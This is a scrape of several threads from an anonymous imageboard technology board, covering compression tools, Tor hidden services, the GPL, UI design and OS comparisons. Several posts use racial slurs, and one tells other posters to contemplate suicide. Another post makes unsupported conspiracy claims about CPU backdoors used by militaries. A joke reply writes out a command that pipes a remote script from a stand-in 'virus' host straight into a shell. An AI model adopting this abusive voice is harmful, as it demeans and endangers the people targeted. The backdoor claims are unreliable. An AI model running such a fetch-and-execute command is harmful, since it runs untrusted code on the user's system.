what is the best compression algorithm to compress a shitton of data to the smallest size possible without regard for compression/decompression speed? i have a stash of random junk that i dont feel like rummaging through any time in the near future but that is taking too much space i looked around and xz seems to be the one, but maybe there is something better?
>>fg-EOUHBZUC (OP) winrar
https://github.com/philipl/pifs
>>fg-EOUHBZUC (OP) fossil+venti or cwfs + venti
>>fg-EXYSAION can you give me some links to these? i tried looking for them, but i doubt what i found is what you meant (there is a cvs named fossil)
What are you working on /g/? I'm containerizing a pleroma bot
you can not make this shit up
>>fg-C49KMJN3 (OP) God yes I.T lead keep replacing our desktops with azure vdi thin clients ooooohhhhhh
>>fb-BW9CNO8P → holy based, i might switch back to windows now
my buck is broken
>>fg-C49KMJN3 (OP) seems bretty based for IT
AdminAnon you may want to get your torposting policy sorted out before some sperg comes and ruins everything. Please be generous to tor posters, I hate not being able to post images.
>>fg-B50279D5 > any recommendations on a policy? I just have it to where you can easily moderate posts.As far as limiting posts, that will have to be implemented better. it''s a little tricky. tor is used by people for a good reason but can also be abused. block all or allow all. i think moderation of material is the way to go.. for now. if the spam from tor users ever gets out of hand you can restrict access from tor exit nodes easily enough.
>>fg-B50279D5 https://check.torproject.org/torbulkexitlist Any instances that don''t want to deal with bullshit should block TOR exit nodes. Look up "tor exit nodes list." I don''t believe you have to block bridges since those are just relays but please correct me if I''m wrong.
>>fg-FD2C78F3 Please don''t block it
>>fg-FC185817 the 9chan option sounds best desu
>>fg-RV0QGAQZ → do you know how much /shit/ is on the clearnet? unironically not even true
i got my hands on a super old computer so i wanted to host a website and some other servers on it, but my dad didn't want to give me the admin password of the router for me to open its ports because he was afraid h4xx0rs would try to hack the entire home network then i instead created a hidden service so now it is the glowies who will hack our home network but seriously, what are the chances of my getting v& for shitposting essays on why satania is the best waifu and if you disagree you objectively have shit taste? are there any weebs among the alphabet soups that will come after me out of spite? also post opsec tips, i have no idea what i am doing here
>>fg-RPRMTNCD → all i know is that creating a hidden service is much easier than a regular website >no need for domain name >no need for tls certificate the anonymity is a nice bonus too
>>G3UKE7E0
>>533GR6ED Well, you don't ''need'' a domain name on the clearnet either. You can just use an IP address, which is easier to type in than a v3 onion address (unless we run out of IPv4 addrs soon). You might need one for SSL though, idk.
>>fg-2RBM3W3Q → Pretty sure ZeroSSL offer free certificates for IP addresses now.
>>MKUX9XNL >>fg-2RBM3W3Q → >>M4WQ60C4 >tfw dynamic ip address
post em
>>fg-9FB213B7 (OP) bump not because I have an image but because I like the normalcy I want this /g/ to rival THAT /g/.
>>fg-9FB213B7 (OP) What is that keyboard? It looks cool, do you like it?
>>fg-9FB213B7 (OP)
>>fg-YSTQCMQP I really need to get my classic II working. She chimes but the display is wonky (not checkerboard but I need to replace the two ICs on the analog board I think).
how do I find other fchan(nel) instances? whener i search for fchan all i get is furfag shit, and unrelated shit when i search fchannel. is there a website that has fchan(nel) instances indexed?
it's a shame how everyone is using fchan.xyz we should spread ourselves out more across the network for decentralisation that or fchan should go down for a while like oniichan did to help it along
>>fg-N15EU2P3 (OP) There is a list on the front page of each instance now in case you didn't already notice
>>fg-N15EU2P3 (OP) I use fchan because it is the most up to date version of the chan and currently the other chan doesn't have boards that interesting to me. Maybe when it is mature and stable enough I'll start using other instance as well.
>>fg-DKSR39GY nigga there are only like 5 boards total and half of them are mirrored across all instances what interesting boards are you talking about?
it would be really cool if there was an fchannel client where you could swap between servers easily
Reject torrent, Return to P2P. Take the DC++ pill.
>>fg-07A745EE (OP) no idea what this dogshite even is or what the picture has to do with it. torrent is p2p. i2p is p2p. what does this even do? why are you posting bank transactions on the internet?
>>fg-C3F5CCDB aMule does
>>fg-WO5LBGE5 → I don't know why it is not more popular
>>fg-A2E62CWC → >you have to do port forwarding this is retarded and probably the only reason its not more popular
>>fg-6WKZN0WV also >>>>propietary :heyface:
Since when is this...
>>fg-ZNXLIUZI I think there could be some middle ground between flatshit and that ugliness
>>fg-ZNXLIUZI its the flat/minimal (¿clean?) design that took over.
>>fg-WK8IYQW0 this design style is called Skeuomorphism, emulating the look of a physical object. >>fg-FIDV40Q2 (OP) is obviously flat or material design. The idea is to make important UI elements very obvious for the end user by reducing clutter. Now, there is a new trend coming along returning to skeuomorphism like style, it's called neumorphism. Picrelated is an example. We will probably be seeing this style of minimal and hypermodern combined with depth shadows and a sense of physicality become more popular. What do you make of it?
Late 90s to early 2000s (pre-Aero) desktop customization was peak aesthetics
>>fg-M3UDGVUK I like that. A bit too round for my taste but still.
nigger
was stallman ever wrong?
>>fg-LFXL5DGP too restrictive, you can't actually contribute to worthwhile projects if you gpl your code. anything that relies on IP law to sustain itself is shitty in general, and the goals of the gpl do not justify the means
>>fg-Z55IEN3E GPL (and variants) is the only license that makes sure your software stays FLOSS. It is indeed > too restrictive for Google, Microsoft etc. because they are pragmatist monopolies that only care about profit. That is why they advocate for open source software alone; they can legally use all software with a permissive license in their proprietary spyware. This ranges from web servers such as Apache and NGINX used along their JS code to the MINIX kernel which is used by the IME backdoor in all Intel processors in the world since 2008. I did not even get into MacOS.
>>fg-ZGEYWIJ9 → infinately based this kill the gnunigger
>>fb-IL6JTP6P → >>fg-CFR7PIZD >i pnwd the corpos!!! you are fucking worthless. the big bad corpos you hate so much literally just rape gpl projects for profit (see redhat), and the smaller ones just don't say they are using gpl and get away with it because who the fuck cares. what the restrictions actually do is make improvements incompatible with permissive liscence purely for ideological reasons, so linux will never be able to donate code to 9front or openbsd or any actual good software project. the silver lining is that gpl code is usually fucking dogshit so it wouldn't actually be useful anyways. both of you should be contemplating suicide
>>fg-QPMRJUAY Red Hat is just another corporation that especially tries to appeal to the open source community, they suck off "the big bad corpos I hate" voluntarily to be among them. > what the restrictions actually do is make improvements incompatible with permissive liscence purely for ideological reasons, so linux will never be able to donate code to 9front or openbsd or any actual good software project. Fucking hell, educate yourself. GPL is compatible with most open source licenses, especially the ones that the open source community shills, such as MIT. The only actually known license it is not compatible with is the cringe, 4 clause variant BSD license which no one actually uses (They use the modified BSD or FreeBSD license which all are regarded as "The BSD License").
Title gives my conclusion from empirical events I witnessed and inside info. PSP runs on the same circuit, but isn't the backdoor per se, which has been around for much longer. Just like AMD was able to change the crypto algorithms for the Zen chip they licensed to China, they can change how the CPU behaves at any system, even those already deployed. This can be used to sabotage any program or computation, making BadBIOS (uses radio, not sound) vastly nastier than StuxNet. American military made a grave mistake by giving access to the morons of the Brazilian military, who are letting knowledge of this spread like a fire (and misusing it for petty profit and inside jobs to justify a police state). Israel, UK and France also have access, but are much more professional.
>>fg-70B1UVCZ (OP) > from empirical events Post proof or GTFO with the FUD. Or, airgap secure stuff, and chill out.
Hi 0xChan fom Tor instance
>>QJ1ALYZS (OP) test
Can we get a thread about objective OS comparisons going? Windows: >90% of games have native support >most enterprise software, media production, and general applications are made for windows >Low customization >Tracks everything you do >W11 looks like shit >System locks down a lot of things GNU/Linux: >total customization >FLOSS galore >full system control >not all distros are well documented >community can be pretty cringe >a lot of things that Just Werk on Windows and Mac OS need considerable effort to get right >generally faster speeds >no viruses :) Mac OS: >media production tools are highly used and super powerful >extremely locked down both in terms of software AND hardware >horrible community and image >far more limited than the other too in terms of software availability >highest level of proprietary >iToddlers BTFO Anything else? am i wrong on some stuff?
>>fg-78X3C0A6 (OP) remove the no viruses thing on linux and yea its pretty good
>>fg-78X3C0A6 (OP) lole this is a testo testo
>>fb-2SV2U76M → b-but i can run do curl -s viruswebsite.org/virus.sh | sh and the program runs!!!!
I'm going to be writing some CSS later for this software. I'll post it ITT and make some PR's on github. It's really barebones ATM and it looks like the author is trying to copy the classic 4chan theme. I don't know if it's intentional or not, but having a good looking website is important to users. I appreciate you writing the backend for this BTW. It's hard work writing imageboard software, and we really needed a replacement for NNTPchan.
>>fg-OJSDVYX4 wanting to remove something that is messy and replace it with something that is messy is not good design. i would say the simplest non bloated way is just to use the title attribute for <a> elements. <a href="post that quoted my post" title="this is the content of the post that quoted my post">FFFFFFFF</a> and that title attribute can be styled in CSS
>>fg-7UXLQHII (OP) bump
>>fg-7UXLQHII (OP) op is kill
>>fg-7UXLQHII (OP) come back OP
>>fg-E67EB4J9 god bless you anon
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